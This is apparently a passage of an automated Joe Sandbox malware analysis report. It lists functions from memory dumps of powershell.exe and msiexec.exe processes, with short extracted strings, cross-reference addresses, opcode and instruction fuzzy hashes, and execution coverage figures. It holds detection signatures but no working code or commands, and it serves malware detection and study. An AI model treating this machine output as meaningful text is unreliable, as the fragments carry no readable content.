4'^q, xrefs: 07B2B4A8
4'^q, xrefs: 07B2B1BD
$^q, xrefs: 07B2B47D
$^q, xrefs: 07B2B412

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-1823345594
Opcode ID: b0c8b11d20330d07af5f51f7811a2b78e1a6280effd3beec68ec2a6bbf54a2a3
Instruction ID: 6a3725d2984be58ae3d02569aaa691a62b17fbb82d63fab5e7cf63ef51a257e9
Opcode Fuzzy Hash: b0c8b11d20330d07af5f51f7811a2b78e1a6280effd3beec68ec2a6bbf54a2a3
Instruction Fuzzy Hash: 25F127F1B1522A8FEB258A28C4116ABBBE1EF85311F1484EAD45DCF251EF31C887D791

Function 09411F58 Relevance: 11.6, Strings: 9, Instructions: 387COMMON

Download Yara Rule

Strings

$^q, xrefs: 09412496
$^q, xrefs: 0941247E
84ul, xrefs: 094120AB
$^q, xrefs: 094124A2
tP^q, xrefs: 09411F89
84ul, xrefs: 09411FB3
84ul, xrefs: 09411FBD
84ul, xrefs: 0941209F
tP^q, xrefs: 09411F93

Memory Dump Source

Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9410000_powershell.jbxd

Similarity

API ID:
String ID: 84ul$84ul$84ul$84ul$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-3429795021
Opcode ID: d95957bde5e63a42b707db4f6939fbfaaf59513b86800402cbba46e5091d2282
Instruction ID: 3a91a3dce2e2f6dc2b6f841a5af1775068eda1a8d22543a7f3ba3b75ac7d6440
Opcode Fuzzy Hash: d95957bde5e63a42b707db4f6939fbfaaf59513b86800402cbba46e5091d2282
Instruction Fuzzy Hash: FFD1C531B002189FCB259F68C85176BBBE2EF88351F14846BE915DB390DBB2DD46C7A1

Function 07B2E885 Relevance: 11.5, Strings: 9, Instructions: 205COMMON

Download Yara Rule

Strings

(dq, xrefs: 07B2EAAA
84ul, xrefs: 07B2EA92
(dq, xrefs: 07B2EB0E
tP^q, xrefs: 07B2EAE4
tP^q, xrefs: 07B2E9E9
84ul, xrefs: 07B2E996
(dq, xrefs: 07B2EB18
4'^q, xrefs: 07B2EBBC
$^q, xrefs: 07B2E915

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$84ul$tP^q$tP^q$$^q$(dq$(dq$(dq
API String ID: 0-1179358571
Opcode ID: 81a5dad63fc0eb12ad9a24bdc7908ee11f0320d4e890604cc291f5b0f8482d24
Instruction ID: bea5f949fb3b1c099aa5c1d86817634a577ae6180e71a4d21b72487e7eda0a00
Opcode Fuzzy Hash: 81a5dad63fc0eb12ad9a24bdc7908ee11f0320d4e890604cc291f5b0f8482d24
Instruction Fuzzy Hash: 2371C7F0A02225DFEB24CF16C54CBAAB7E2EF45311F2984D6E8096B291C631ED42DB51

Function 07B2E898 Relevance: 11.4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

(dq, xrefs: 07B2EAAA
84ul, xrefs: 07B2EA92
(dq, xrefs: 07B2EB0E
tP^q, xrefs: 07B2EAE4
tP^q, xrefs: 07B2E9E9
84ul, xrefs: 07B2E996
(dq, xrefs: 07B2EB18
4'^q, xrefs: 07B2EBBC
$^q, xrefs: 07B2E915

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$84ul$tP^q$tP^q$$^q$(dq$(dq$(dq
API String ID: 0-1179358571
Opcode ID: b49d695afaf6c76069fc99fbc25b559cf673450904fdd14a7e6852ca934b9e01
Instruction ID: fdebf52612c25ae1e499a589aa63adbc3e348374b4f559869993d657f81887f8
Opcode Fuzzy Hash: b49d695afaf6c76069fc99fbc25b559cf673450904fdd14a7e6852ca934b9e01
Instruction Fuzzy Hash: ED61C7F0A022259FEB24CF56C54CBAAB7E2FF45311F2984D6E8095B291C731ED42DB91

Function 07B2F03C Relevance: 10.2, Strings: 8, Instructions: 200COMMON

Download Yara Rule

Strings

$^q, xrefs: 07B2F1BA
84ul, xrefs: 07B2F09A
4'^q, xrefs: 07B2F22E
84ul, xrefs: 07B2F0A4
tP^q, xrefs: 07B2F0EA
tP^q, xrefs: 07B2F0F6
4'^q, xrefs: 07B2F222
$^q, xrefs: 07B2F1AA

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$84ul$84ul$tP^q$tP^q$$^q$$^q
API String ID: 0-182408052
Opcode ID: 18fbf1bd123b12ab532bf5201f3f384ef3753697a296e606bd7334e564dcf6f8
Instruction ID: a8e55b1ca4968afa8fecc974a11b09313c48b18e44779b3bae6338ea67710618
Opcode Fuzzy Hash: 18fbf1bd123b12ab532bf5201f3f384ef3753697a296e606bd7334e564dcf6f8
Instruction Fuzzy Hash: E661F5F1B012299FEB148E54C8457BA77B2FF89352F648499ED095F284CB31DC42DBA1

Function 07B2E534 Relevance: 10.2, Strings: 8, Instructions: 160COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07B2E6B6
$^q, xrefs: 07B2E774
4'^q, xrefs: 07B2E7A6
TQcq, xrefs: 07B2E74A
TQcq, xrefs: 07B2E5A2
$^q, xrefs: 07B2E5C3
84ul, xrefs: 07B2E664
$^q, xrefs: 07B2E5E4

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$TQcq$TQcq$tP^q$$^q$$^q$$^q
API String ID: 0-3752238523
Opcode ID: 507f8f12bde47646d62ef758fa374626083d9f6cb57d8bc439cf021512026959
Instruction ID: 86a074273b0c3e1edabde01e13a61f0b8a02593c7b56cc6931d65c923f49401e
Opcode Fuzzy Hash: 507f8f12bde47646d62ef758fa374626083d9f6cb57d8bc439cf021512026959
Instruction Fuzzy Hash: 6151D2F0612226DFEB258E06C50C77677A2FF45311F1484E9E8089F2A0DB31DC86EBA1

Function 07B2E548 Relevance: 10.2, Strings: 8, Instructions: 153COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07B2E6B6
$^q, xrefs: 07B2E774
4'^q, xrefs: 07B2E7A6
TQcq, xrefs: 07B2E74A
TQcq, xrefs: 07B2E5A2
$^q, xrefs: 07B2E5C3
84ul, xrefs: 07B2E664
$^q, xrefs: 07B2E5E4

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$TQcq$TQcq$tP^q$$^q$$^q$$^q
API String ID: 0-3752238523
Opcode ID: 5c12481c77b705d53fece99c5f5ae591735932a5a5f6abc593ec67c8eab23356
Instruction ID: 5fa5ca753f861fb6675197c670a806f82c2edbcb485b765bfe43e037347f3596
Opcode Fuzzy Hash: 5c12481c77b705d53fece99c5f5ae591735932a5a5f6abc593ec67c8eab23356
Instruction Fuzzy Hash: 4051C1F0612226DBFB258E06C50C77677A1FB45311F5884E9E80D9F2A0DB75DC82EBA1

Function 07B26D70 Relevance: 8.9, Strings: 7, Instructions: 191COMMON

Download Yara Rule

Strings

ml, xrefs: 07B26F73
$^q, xrefs: 07B26F2E
$^q, xrefs: 07B26F22
ml, xrefs: 07B26F65
4'^q, xrefs: 07B26E26
$^q, xrefs: 07B26EF7
4'^q, xrefs: 07B26E1A

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$ml$ml
API String ID: 0-1644293777
Opcode ID: 07fc882cdf79c8c8287021a1324ee99dcfebc2a31d930ac7538287cc73922706
Instruction ID: a7061c82be0c43a707bcd268143d7d2e28aa5e6e66d869b49ec049ecdb9af055
Opcode Fuzzy Hash: 07fc882cdf79c8c8287021a1324ee99dcfebc2a31d930ac7538287cc73922706
Instruction Fuzzy Hash: B35168F170222A9FEF259A29C401366BBF2EFC5219F1484EAD44DCBA41DA32C853D791

Function 07B2E000 Relevance: 8.9, Strings: 7, Instructions: 175COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07B2E1F9
4'^q, xrefs: 07B2E297
$^q, xrefs: 07B2E0E0
d%dq, xrefs: 07B2E223
84ul, xrefs: 07B2E1A7
d%dq, xrefs: 07B2E22D
d%dq, xrefs: 07B2E1BF

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$d%dq$d%dq$d%dq$tP^q$$^q
API String ID: 0-479564272
Opcode ID: b0cb76b6cd125e65ac442dde40362ff007b4dc11e0735880b805885c7c007f4b
Instruction ID: b2b7881af2cc9ba7ee0bae339fed0ed14da2430b7153e0b1c4e2290347e8586f
Opcode Fuzzy Hash: b0cb76b6cd125e65ac442dde40362ff007b4dc11e0735880b805885c7c007f4b
Instruction Fuzzy Hash: E25167F0A01225CFEB258F16C549A7ABBA2EF45741F0880DAD8099F291CB31DD43DBA1

Function 07B2B5C6 Relevance: 7.9, Strings: 6, Instructions: 403COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07B2BA29
4'^q, xrefs: 07B2BA3F
x.hk, xrefs: 07B2BC05
4'^q, xrefs: 07B2B99B
4'^q, xrefs: 07B2B985
-hk, xrefs: 07B2BC3C

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$x.hk$-hk
API String ID: 0-70303282
Opcode ID: ddd39b098e725b0fdd0cd8f831fc219d61fe4cd198ed2944fa12adbd5d489d2d
Instruction ID: 33b85f5a9e60a62d85cdceb80b0b07db43e771463c4cdca6c07b9ce907237654
Opcode Fuzzy Hash: ddd39b098e725b0fdd0cd8f831fc219d61fe4cd198ed2944fa12adbd5d489d2d
Instruction Fuzzy Hash: 4A125DF0A00229DFDB24DF14C950BAABBB2FB85304F1085E5D9096B391DB72AD85CF91

Function 07B2EF3C Relevance: 7.7, Strings: 6, Instructions: 206COMMON

Download Yara Rule

Strings

84ul, xrefs: 07B2F09A
$^q, xrefs: 07B2EFEC
$^q, xrefs: 07B2EFCB
tP^q, xrefs: 07B2F0EA
4'^q, xrefs: 07B2F222
$^q, xrefs: 07B2F1AA

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$tP^q$$^q$$^q$$^q
API String ID: 0-109380643
Opcode ID: 0b4d0ea7c3cd61fc01f3bd5de9eddb4c191aa301977ab83ce00e83e346c5cf4f
Instruction ID: 3cdbe483f0fb0b60b2dc60f814c6e1aa8fa44142dc3ce2032e8ba3fb19f0b522
Opcode Fuzzy Hash: 0b4d0ea7c3cd61fc01f3bd5de9eddb4c191aa301977ab83ce00e83e346c5cf4f
Instruction Fuzzy Hash: 3B71F5F470222ADFFB248E15C544BBA77B2EF46312F5484E6E8095B294C731DD82EB91

Function 07B2EF50 Relevance: 7.7, Strings: 6, Instructions: 185COMMON

Download Yara Rule

Strings

84ul, xrefs: 07B2F09A
$^q, xrefs: 07B2EFEC
$^q, xrefs: 07B2EFCB
tP^q, xrefs: 07B2F0EA
4'^q, xrefs: 07B2F222
$^q, xrefs: 07B2F1AA

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$tP^q$$^q$$^q$$^q
API String ID: 0-109380643
Opcode ID: 9ddad647af488ca93c22d78ede753c3d9572100589a30ff3404161e42d2d9a2b
Instruction ID: 34218799358ed6e2ab49dd8e5a170c09baec61e856d9526e37702652d8e1a424
Opcode Fuzzy Hash: 9ddad647af488ca93c22d78ede753c3d9572100589a30ff3404161e42d2d9a2b
Instruction Fuzzy Hash: C161D4F470222ADFFB248E15C544BBA77B2EF46352F9484D5E8095B294C731DC82EB91

Function 07B20284 Relevance: 7.6, Strings: 6, Instructions: 89COMMON

Download Yara Rule

Strings

$^q, xrefs: 07B20352
4'^q, xrefs: 07B20373
4'^q, xrefs: 07B202EB
4'^q, xrefs: 07B2037F
4'^q, xrefs: 07B202F7
$^q, xrefs: 07B2035E

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
API String ID: 0-1041444323
Opcode ID: 805463c11280edae8d8fa24ac7188a075984c71314c3250a5727fa7d7a039faa
Instruction ID: 512f09ba88400cffa32757701b20df649cc105d969b941d140bd9b075d1f4b97
Opcode Fuzzy Hash: 805463c11280edae8d8fa24ac7188a075984c71314c3250a5727fa7d7a039faa
Instruction Fuzzy Hash: E9216EF1B0D3264FE729262818252756BE29FC5651B2945EBC449CF346CE215C474397

Function 07B2E146 Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07B2E1F9
4'^q, xrefs: 07B2E297
d%dq, xrefs: 07B2E223
84ul, xrefs: 07B2E1A7
d%dq, xrefs: 07B2E22D
d%dq, xrefs: 07B2E1BF

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84ul$d%dq$d%dq$d%dq$tP^q
API String ID: 0-2431970000
Opcode ID: a6d81644a52c5c1725223d066a243ce72b2a09e8bbfd15a35660d1e82797c8c2
Instruction ID: f0f077513747cd4b01fdf802eaab4b1bc02280da887eb9a13469698b8966bb4e
Opcode Fuzzy Hash: a6d81644a52c5c1725223d066a243ce72b2a09e8bbfd15a35660d1e82797c8c2
Instruction Fuzzy Hash: 8531D3F0B012259FEB28CF55C448A69B7E2FF89710F248499E90A6B350C731DD42CBA1

Function 07B20538 Relevance: 6.4, Strings: 5, Instructions: 132COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07B20632
$^q, xrefs: 07B205C4
$^q, xrefs: 07B205FD
$^q, xrefs: 07B20609
4'^q, xrefs: 07B20626

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 6b68732914e2d722bdde4739f4ef585a77fd928307ea4b310f2d893183f70339
Instruction ID: b70072fa0ac935af16fa5fad9672dc3724ccf6c62cbfc9304c24c3ee72c3a137
Opcode Fuzzy Hash: 6b68732914e2d722bdde4739f4ef585a77fd928307ea4b310f2d893183f70339
Instruction Fuzzy Hash: 4A4148F1B1622ADFEF266B24881067A7BB1EFC1201F1444EAD809CB251DF31C946D7A2

Function 09411020 Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

$^q, xrefs: 09411070
$^q, xrefs: 09411054
tP^q, xrefs: 094110D4
$^q, xrefs: 0941108F
$^q, xrefs: 09411038

Memory Dump Source

Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9410000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: cfb6b3a7fad290c81be3310a6eebe3a741a5873eece5b7631ed05b6f2958e281
Instruction ID: 16e3f518bec777bfd1a5b1382be8e9126df7e8a3a36e5a621bdbb2dee08006ac
Opcode Fuzzy Hash: cfb6b3a7fad290c81be3310a6eebe3a741a5873eece5b7631ed05b6f2958e281
Instruction Fuzzy Hash: 00210332E0C258CFDB248F55C980A7ABBF9AF48755B14406BFA049F721CB32D908C761

Function 07B2D908 Relevance: 5.5, Strings: 4, Instructions: 477COMMON

Download Yara Rule

Strings

(o^q, xrefs: 07B2DD41
(o^q, xrefs: 07B2DD31
(o^q, xrefs: 07B2D9EE
(o^q, xrefs: 07B2D9FE

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: c9dd250bd714ab94f2822253c61b44f58c84b0d4f9d725237c77716413ae0655
Instruction ID: 7b6bee60673a0c5c67f8c50fe7f5f630a4fa55f0ad879ffb61185d19db06c327
Opcode Fuzzy Hash: c9dd250bd714ab94f2822253c61b44f58c84b0d4f9d725237c77716413ae0655
Instruction Fuzzy Hash: 06F15AF1705325DFEF149F28C844BAABBA2EF86311F1484EAE5198F291CB31D846D761

Function 07B22B30 Relevance: 5.3, Strings: 4, Instructions: 277COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07B22C6E
84ul, xrefs: 07B22C15
tP^q, xrefs: 07B22C62
84ul, xrefs: 07B22C0B

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 84ul$84ul$tP^q$tP^q
API String ID: 0-2572913987
Opcode ID: c564c701d11aa344c5aec356d83182a12d1977b597d88d5bec2fb1f57750d176
Instruction ID: 91a801343367cf863651d593a4a2e4c060cf91fe4fbe81c4ba831d5194074eb8
Opcode Fuzzy Hash: c564c701d11aa344c5aec356d83182a12d1977b597d88d5bec2fb1f57750d176
Instruction Fuzzy Hash: F6915BF1B012259BDB185F7888447BABBE2FF85750F1984AAD809DF391CA31D842D7A1

Function 07B296F8 Relevance: 5.1, Strings: 4, Instructions: 108COMMON

Download Yara Rule

Strings

,Swl, xrefs: 07B2982C
d5gk, xrefs: 07B2981E
4'^q, xrefs: 07B2984D
xSwl, xrefs: 07B2976E

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: ,Swl$4'^q$d5gk$xSwl
API String ID: 0-1526504282
Opcode ID: d72759a1bb7ca6f92e7d3d7e69049ea0446691623e274a76373d5aaa7c90e233
Instruction ID: 19b55c160e0c93d06d0b5532b2f9183a9d700237700221b27f8e84804051c739
Opcode Fuzzy Hash: d72759a1bb7ca6f92e7d3d7e69049ea0446691623e274a76373d5aaa7c90e233
Instruction Fuzzy Hash: 31310AF0B062268FEB249F68C5486A97BA1EF45740F0980F6D50CAF261CB31E846D7E1

Function 07B28D38 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07B28D4A
$^q, xrefs: 07B28D94
$^q, xrefs: 07B28DA0
$^q, xrefs: 07B28D66

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: ebeb6f8dc62b6c70dfc2145f8e546b5dbea431eb309a5a9a617747d764463c08
Instruction ID: 0524ba261c2c82fe69412063e39a84b061ccc9d8f01864ccd0ef8687cf4973c7
Opcode Fuzzy Hash: ebeb6f8dc62b6c70dfc2145f8e546b5dbea431eb309a5a9a617747d764463c08
Instruction Fuzzy Hash: 1F2149F131132667FB3859398801B377AD6DBD1791F2488BED50DCB281DE39D8469361

Function 07B2A6C4 Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

$^q, xrefs: 07B2A797
$^q, xrefs: 07B2A737
$^q, xrefs: 07B2A77B
$^q, xrefs: 07B2A753

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 88e1e4d303b530f4209430135e9be214d184fb6a301202b69d692bb834f9916c
Instruction ID: d4483f933f351c8abbd17cc839c59e9e03a407a1e70b67dad6459b5176a42114
Opcode Fuzzy Hash: 88e1e4d303b530f4209430135e9be214d184fb6a301202b69d692bb834f9916c
Instruction Fuzzy Hash: 0C21B2F1A062269FFB25AE548944665BBB0EF45650F18C0FBCC088B252DA31C54BE795

Analysis Process: msiexec.exePID: 8044, Parent PID: 7512COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	166
Total number of Limit Nodes:	17

Executed Functions

Function 20F7C147 Relevance: 6.5, Strings: 5, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 20F7C377
0oAp, xrefs: 20F7C20A
LjAp, xrefs: 20F7C38D
PH^q, xrefs: 20F7C400
PH^q, xrefs: 20F7C3EF

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: c09fa84dd09bcb0cc3c74fbd95a60fcbee8cc5058a6187fc52c67090014126f5
Instruction ID: 9310d45809d8a190490f75a0dbacb8567c32edf9cbfe078cfd1e64ac494a31df
Opcode Fuzzy Hash: c09fa84dd09bcb0cc3c74fbd95a60fcbee8cc5058a6187fc52c67090014126f5
Instruction Fuzzy Hash: 01A1D775E40218DFEB04CFA9D894A9DBBF2BF89310F14C06AE908AB365DB749941CF51

Function 20F75369 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 20F755C8
PH^q, xrefs: 20F755D9
LjAp, xrefs: 20F75566
0oAp, xrefs: 20F753E2
LjAp, xrefs: 20F75550

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 8884477b44c8b7d1c85c8692d9e8915f484405120204985d9f529f0882072833
Instruction ID: 3fdc77ea7c12aff607e42166d57f214b3afde082ccc555db3fcc2f38384bf8ed
Opcode Fuzzy Hash: 8884477b44c8b7d1c85c8692d9e8915f484405120204985d9f529f0882072833
Instruction Fuzzy Hash: C781D674E40218DFDB14CFA9C994A9DBBF2BF89310F14C06AE808AB365DB749985CF51

Function 20F7C468 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 20F7C6BF
LjAp, xrefs: 20F7C65D
0oAp, xrefs: 20F7C4DA
LjAp, xrefs: 20F7C647
PH^q, xrefs: 20F7C6D0

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: b12ca901d23d355dfd06587ef76aaea5a06282a9134949075fdc0a752fca1144
Instruction ID: 00f7fc96073154bb6906165023947c737da9943b8038ecf4272b58e897762e7f
Opcode Fuzzy Hash: b12ca901d23d355dfd06587ef76aaea5a06282a9134949075fdc0a752fca1144
Instruction Fuzzy Hash: 9381D674E40218DFEB14CFA9C984A9DBBF2BF88310F14C06AE818AB365DB745981CF51

Function 20F7D278 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 20F7D4CF
LjAp, xrefs: 20F7D46D
PH^q, xrefs: 20F7D4E0
LjAp, xrefs: 20F7D457
0oAp, xrefs: 20F7D2EA

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 32f649ba0cd00f410df9c34f135c0bb337f57547e21806dadad690e9ef2ef173
Instruction ID: c9e7506165f5aad9f990f01d2b87a6891f56502ae02160815f3db6d2f640643d
Opcode Fuzzy Hash: 32f649ba0cd00f410df9c34f135c0bb337f57547e21806dadad690e9ef2ef173
Instruction Fuzzy Hash: 3381C375E40218DFDB14DFA9C884A9DBBF2BF89310F54C06AE818AB365DB746981CF11

Function 20F7CA08 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 20F7CC5F
PH^q, xrefs: 20F7CC70
0oAp, xrefs: 20F7CA7A
LjAp, xrefs: 20F7CBE7
LjAp, xrefs: 20F7CBFD

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: cbe810ee25adf04507946f8289eda3678851234f80957622ee331474f5a58b3b
Instruction ID: d09a61f8af7141b820a71bc13358f5d4ab8aeb48e139928a5220324b27f93915
Opcode Fuzzy Hash: cbe810ee25adf04507946f8289eda3678851234f80957622ee331474f5a58b3b
Instruction Fuzzy Hash: 9981B674E40258DFEB14DFA9C894A9DBBF2BF88310F14C06AE818AB365DB745981CF51

Function 20F7CCD8 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 20F7CECD
PH^q, xrefs: 20F7CF2F
LjAp, xrefs: 20F7CEB7
PH^q, xrefs: 20F7CF40
0oAp, xrefs: 20F7CD4A

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 70f938695f33b90862c3baf06211cd3445f616c4eb8315907e6fae3e5a9fe932
Instruction ID: f91a922ca9b963e372c9540eeb30116c8a88f8f4dfac11dde542b0c4b6754d9d
Opcode Fuzzy Hash: 70f938695f33b90862c3baf06211cd3445f616c4eb8315907e6fae3e5a9fe932
Instruction Fuzzy Hash: 3E81C674E40218DFEB14DFA9C984A9DBBF2BF88310F14C06AE818AB365DB745981CF51

Function 20F7C738 Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

